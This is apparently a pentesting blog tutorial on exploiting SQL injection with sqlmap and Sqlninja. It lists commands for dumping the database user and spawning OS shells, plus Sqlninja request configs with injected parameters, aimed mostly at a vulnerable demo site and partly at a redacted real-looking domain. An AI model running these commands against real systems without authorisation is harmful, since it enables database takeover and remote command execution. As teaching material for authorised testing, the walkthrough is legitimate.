i Penetration Test – Exploit with SQL Injection – All things in moderation

Penetration Test – Exploit with SQL Injection

Now, you guys have found unusual things on their website. These findings cover for website application testing like: SQL injection (SQLi), Cross Site scripting (XSS), cross-site request forgery (CSRF), Session Token Entropy, fuzzing/input validation, and business logic. In this post, I will focus on SQL injection.

SQL Injection

As you know, when you able to identify some SQL Injections ( SQLi) vulnerabilities that could lead to a full control of the database or the system. At this point, I usually use two open source tool are SQLmap and SQLninja.

I. SQLmap

You can find the tutorial here, but like usual,  I will give you another view about this one. SQLmap is my favorite tool to manipulate database queries and dump databases. It also support Meterpreter Backdoor or a VNC session for us.
Here is a quick look about SQLmap fuctions provided.

sqlmap -h

  • Image SQLmap help file
    pentest web sqlmap

1 . We will start with GET parameter vulnerability that is where a SQL injection is located with the URL. We have to test many parameter to make sure that we have found a real SQL injection. I have seen a number of false positives so the validation is needed. If we are not specific the value to test, SQLmap will use its default parameters.

  • Finding if an SQL injection is valid

sqlmap -u http://www.xxx.org/index.php?id=-10 -b

pentest web sqlmap

  • Get the database username

sqlmap -u http://www.xxx.org/index.php?id=-10 –current-user

pentest web sqlmap

  • Turn on an Interactive Shell

sqlmap -u http://www.xxx.org/index.php?id=-10 –os-shell

pentest web sqlmap

Because we don’t have write permission with this website, so our shell couldn’t upload. 😀

pentest web sqlmap

If you know the type of database and do know an injection is possible but SQL have found nothing, you should try to set the –dbms=”database type” flag.

Or you need to test an authenticated SQL injection finding, use Burp to grap the cookie and define it using the –data=”cookie” switch

2 . With POST parameter vulnerability, the parameters are passed in the data section instead of being in the URL. Because Web Server will log GET parameters and you don’t want to see your passwords in the log. And because of the size limitations with GET method, many data will be passed as POST parameters for larger applications.

The example  is the rather similar to GET so I don’t take a photo here.

  • Finding if an SQL injection is valid

sqlmap -u “http://testphp.vulnweb.com/login.php” –data=”uname=admin&pass=admin” -b

  • Get the database username

sqlmap -u “http://testphp.vulnweb.com/login.php” –data=”uname=admin&pass=admin” –current-user

  • Turn on an Interactive Shell

sqlmap -u “http://testphp.vulnweb.com/login.php” –data=”uname=admin&pass=admin” –os-shell

You could have an os-shell on it, you will have full command line access as the database user.

II. Sqlninja

First of all, I don’t know why but I love its name. :D. It is another wonderful SQL injection tool. With SQLmap and Sqlninja, we have two great tool to do our tricks.

A quick look about Sqlninja:

  • Image Sqlninja help file

pentest web sqlninja

The only problem thing I have found with Sqlninja that is the config file is a bit hard to set up. But it is nothing because we are pro, right ?

In Sqlninja, you just need to define the vulnerable variable via SQL2INJECT
Before we use Sqlninja, we need to fill their configuation file. It contains the information about the URL, the type of HTTP method, session cookies and something else.

The best way to get the required information for Sqlninja that is turn on Burp Suite and take it. This step will also give you most of information for Sqlninja injections.

  • Image Burp Request.

pentest web sqlninja

  1. We will start with GET parameter vulnerability. First, we need to write sql_get.conf with two vulnerable parameters.

gedit ~/Downloads/sql_get.conf

And fill this config:

–httprequest_start–
GET http://testphp.vulnweb.com/userinfo.php?user=test’;SQL2INJECT&pass=test’;__SQL2INJECT__HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
–httprequest_end–

2 . With POST request, it has a little bit difference here.

gedit ~/Downloads/sql_post.conf

–httprequest_start–
POST http://testphp.vulnweb.com/userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://testphp.vulnweb.com/login.php
Connection: close
Content-Type: application/x-www-form-urlencoded
user=test’;SQL2INJECT&pass=test’;SQL2INJECT
–httprequest_end–

3 . Now, we are ready to use Sqlninja.

sqlninja -mt -f sql_get.conf

pentest web sqlninja

This command will run Sqlninja in the test mode to see if the injection works with our configuration file. If we have a valid SQL injection, we can start to attack the database. Like this:

sqlninja -mt -f sql_post.conf

pentest web sqlninja

  • Image Sqlninja attack database

pentest web sqlninja

If we have xp_cmdshell, we can start try command line access base on the privileges we have.

sqlninja -f [configuration_file] -m c

During this test, we looks like running commands on the server but we need to validate it. The way to do it that is put tcp-dmp to listen for pings on a server we have by this command:

tcpdump -nnvXSs 0 -c2 icmp

After this post, I think you guys know how to deal with Sql Injection using SQLMap or Sqlninja. In the next post, we will take a deep look on XSS and CSRF.

2 Comments

  1. xxx August 31, 2016
    • Stephen Stinson August 31, 2016

Leave a Reply